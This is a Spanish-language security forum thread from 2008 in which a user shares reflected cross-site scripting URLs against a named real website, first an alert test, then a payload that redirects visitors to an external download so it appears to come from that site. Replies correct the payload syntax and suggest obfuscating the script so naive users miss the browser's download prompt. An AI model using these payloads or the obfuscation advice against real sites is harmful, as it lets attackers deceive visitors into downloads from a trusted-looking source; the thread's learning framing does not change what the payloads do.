[XSS] lawebdelprogramador

Iniciado por Achernar, 12 Abril 2008, 01:48 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

Achernar

12 Abril 2008, 01:48 AM Ultima modificación: 12 Abril 2008, 12:31 PM por Achernar
la web del programador no tiene sistema de usuarios asi que creo que esto no haga ningun mal... si se puede hacer daño aliento a que NO lo hagan eso solo lo hago con el fin de aprender...

esto si funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(5)</script>

esto no funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(vulnerable)</script>

porque? hay que codificar el texto de algun modo? hay algun tipo de filtro?
y que se puede lograr en un ataque de este tipo a una web que no tiene usuarios y passwords? robar cookies no tiene ningun sentido aparente o si ?

----- MINUTOS DEPUES ----

JAJAJA esto es groso jajajjaja

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>self.location='http://www.winrar.es/descargas/52';</script>

parece como que descarga el winrar desde la web del programador jajajjaja

esta bueno, perdon por la alegria pero es la primera vez que hago algo asi jajaj

ahora le veo muchas utilidades!  :xD :xD :xD

marlon_agz

#1
12 Abril 2008, 01:58 AM
felicidades :)

leyendo se logran muuuuchas cosas   jejeje

salu2

berz3k

#2
12 Abril 2008, 02:23 AM
Antes de la descarga existe un "POP ALLOW" tanto en firefox como en IE, para un usuario dummie, lo pasaria por alto y el XSS de nada serviria :D, podria ofuscarse un poco mas el code para forzar al nevegador y que no se observe el POP.

-berz3k.

Ferсhu

#3
12 Abril 2008, 02:24 AM
Citar
http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(vulnerable)</script>

eso si funcionaria si estuviera bien escrito, faltan las ' '.

creo q es xss no xxs, pero es una tonteria jej :p

Para poner bugs en el foro, tenes q poner todo la info en una web tuya, y en el post, poner el link citandose esa web, para desligar al foro, creo q es por precausion solamente, pero es una norma.




Securitykill

#4
12 Abril 2008, 02:28 AM
Pues ya han tenido varios XSS :P

Código [Seleccionar]

http://www.xssed.com/mirror/29013/

Saludos

Achernar

#5
12 Abril 2008, 12:57 PM
Cita de: Ferñhu en 12 Abril 2008, 02:24 AM
creo q es xss no xxs, pero es una tonteria jej :p

solucionado, Gracias  ;D.


Cita de: berz3k en 12 Abril 2008, 02:23 AM
Antes de la descarga existe un "POP ALLOW" tanto en firefox como en IE, para un usuario dummie, lo pasaria por alto y el XSS de nada serviria :D, podria ofuscarse un poco mas el code para forzar al nevegador y que no se observe el POP.

-berz3k.



Como se podria hacer eso? aprovechando otro bug? o con un script se puede?


Cita de: Ferñhu en 12 Abril 2008, 02:24 AM

Para poner bugs en el foro, tenes q poner todo la info en una web tuya, y en el post, poner el link citandose esa web, para desligar al foro, creo q es por precausion solamente, pero es una norma.


Nu sabia, si hay que borrar el post esta todo bien :]
Imprimir
Ir Arriba Páginas1
Acciones del Usuario